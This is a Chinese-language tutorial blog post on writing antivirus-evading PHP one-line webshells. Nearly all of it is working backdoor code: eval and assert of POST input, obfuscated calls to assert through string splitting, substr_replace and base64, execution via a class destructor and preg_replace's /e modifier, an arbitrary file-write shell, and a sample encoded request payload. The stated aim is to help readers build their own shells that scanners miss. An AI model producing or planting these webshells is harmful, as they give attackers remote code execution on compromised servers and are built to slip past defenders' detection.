php一句话免杀简单学习(附赠自用免杀一句话)
今天我们简单学习一下php的一句话木马的各种方式,通过学习这些我们可以编写出自己的免杀一句话木马。文章最后附赠免杀一句话。这里较为基础,适合新手入门学习。
基本的一句话
<?php
eval($_POST['haha']);
?>使用assert加载内存
<?php
assert($_POST['haha']);
?>@call_user_func把第一个参数作为回调参数使用
<?php
@call_user_func(assert,$_POST['haha']);
?>这里利用substr_replace函数,这个函数啊是那个参数,意思是将第一个字符串,从第四位后面替换成中间的那个值。
<?php
$a = substr_replace("assexx","rt",4);
$a($_POST['haha']);
?>利用function函数调用变量a,然后下面给fun1中的变量a赋值assert
<?php
function fun1($a){
$a($_POST['haha']);
}
fun1(assert);
?>方式同上,这里是将post赋值给a
<?php
function fun1($a){
assert($a);
}
fun1($_POST['haha']);
?>换行拼接法
$_REQUEST会将值传递过去,下面使用b和a拼接放到eval中,这里的b的值相当于换行执行。
<?php
$a = $_REQUEST['haha'];
$b = "\n";
eval($b.=$a);
?>面向对象法
这里使用面向对象的一种方式设置obj为一个实例对象,然后对象会赋值a一个post
这里使用public匿名生成一个$a,在下面function__destruct中面向对象赋值给a
<?php
class me{
public $a = '';
function __destruct()
{
assert("$this->a");
}
}
$obj = new me;
$obj->a = $_POST['haha'];
?>base64加密法
这里将关键的值使用了base64加密,然后放到里面将解密的值赋值给$a,然后a和后面post拼接执行。
<?php
$a = base64_decode("YXNzZXJ0");
$a($_POST['haha']);
?>字符分割法
这里将所有的字符分开,然后通过$c结合最后拼接post
<?php
$a = "a"."s"."s";
$b = "e"."r"."t";
$c = $a.$b;
$c($_POST['haha']);
?>这里利用一个正则表达式的方式使用@preg_replace函数,该函数里面有三个内容,第一个是搜索模式,第二个是用于替换的字符串,然后是要搜索替换的目标,效果相当于匹配到nihao,将fun的内容拼接到nihao 后面,前面的正则中/e意思是匹配到带入后立即执行。仅适用php7以下
<?php
function fun(){
return $_POST['haha'];
}
@preg_replace("/nihao/e",fun(),"nihao woshi zj");
?>
这里属于中介执行,通过读取一个外部传递的文件,然后d赋值一个data,d就相当于成立了一个data的变量,给他赋值post,下面
然后下面我们就可以使用fwrite对一个打开的文件fp进行写入,写入的内容就是我们的另一个隐藏变量data。后面?是做一个判断,成功返回success,失败返回fail
最后关闭打开的文件$fp
这样我们就可以设置一个文件名写入一个内容。
<?php
if(isset($_POST['file'])){
$d = 'data';
$$d = $_POST['haha'];//$data
$f = 'fp';
$$f = fopen($_POST['file'],'wb');//$fp
echo fwrite($fp,$data)?'save success':'save fail';
fclose($fp);
}
?>正则表达式一句话木马
<?php
$a = $_POST['haha'];
if(isset($a)){
@preg_replace("/\[(.*)\]/e",'\\1','[@eval(base64_decode($_POST[z0]));]');
}
?>此时\\1为@eval(base64_decode($_POST[z0]));
haha=1&z0=cGhwaW5mbygpOw
这里phpinfo进行一个base64加密传输过去